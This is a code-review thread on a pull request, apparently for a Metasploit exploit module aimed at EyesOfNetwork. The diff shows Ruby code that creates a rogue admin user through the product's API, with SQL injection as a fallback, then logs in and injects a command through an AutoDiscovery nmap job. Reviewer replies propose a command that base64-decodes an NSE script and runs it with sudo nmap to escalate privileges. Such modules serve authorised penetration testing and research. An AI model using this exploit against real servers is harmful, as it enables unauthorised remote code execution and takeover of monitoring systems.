modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb

```diff
@@ -0,0 +1,330 @@
+      return
+    end
+
+    api_res.get_json_document()['EONAPI_KEY']
+  end
+
+  def create_eon_user(user, password, sqli)
+    vprint_status("Creating user #{user} ...")
+
+    vars_post = {
+      user_name:  user,
+      user_group: "admins",
+      user_password: password
+    }
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/createEonUser'),
+      'ctype'    => 'application/json',
+      'vars_get' => {
+        'apiKey'   => @api_key,
+        'username' => @api_user
+      },
+      'data' => vars_post.to_json
+    })
+
+    unless res
+      print_warning("Failed to create user: Connection failed.")
+      return
+    end
+
+    unless res.code == 200 && res.get_json_document()['result']['description'].include?('SUCCESS')
+      if res.code == 401 && res.get_json_document()['status'].include?('unauthorized')
+        unless sqli == false
+          print_warning("Failed to create user using API key obtained via SQLI.")
+          return
+        end
+        print_warning("Failed to create user using generated API key.")
+        return "try_sqli"
+      else
+        return
+      end
+    end
+    return "success"
+  end
+
+  def delete_eon_user(user)
+    vprint_status "Removing user #{user} ..."
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/deleteEonUser'),
+      'ctype'    => 'application/json',
+      'data'     => { user_name: user }.to_json,
+      'vars_get' => { apiKey: @api_key, username: @api_user }
+    })
+
+    unless res
+      print_warning 'Removing user #{user} failed: Connection failed'
+      return
+    end
+
+    res
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'vars_post' => {
+        login: user,
+        mdp: pass
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200 && res.body.include?('dashboard_view')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}"
+
+    @cookie = res.get_cookies
+
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+    end
+
+    res
+  end
+
+  def create_autodiscovery_job(cmd)
+    vprint_status "Creating AutoDiscovery job: #{cmd}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/lilac/autodiscovery.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'request'          => 'autodiscover',
+        'job_name'         => 'Internal discovery',
+        'job_description'  => 'Internal EON discovery procedure.',
+        'nmap_binary'      => '/usr/bin/nmap',
```

Comment:
Are there other possible paths that nmap is installed in?

Reply:
Not that I know of. But I think we could rule out this possibility by changing the value of "cmd" to something like `cmd = "a=$(which nmap);echo #{nse} | base64 -d > #{nse_path};sudo ${a} localhost -sn -script #{nse_path};rm #{nse_path}"` . I could test this tomorrow.

Reply:
The path to `nmap` is used twice. This is why it was defined in a method in the original exploit:

```
  def nmap_path
    '/usr/bin/nmap'
  end
```

One instance where this path is used is prior to executing commands, preventing the use of `which`. Also, `which` can be problematic.

Although the source code is available on GitHub, it's generally distributed as an ISO, in which case the binary will always be in the same location.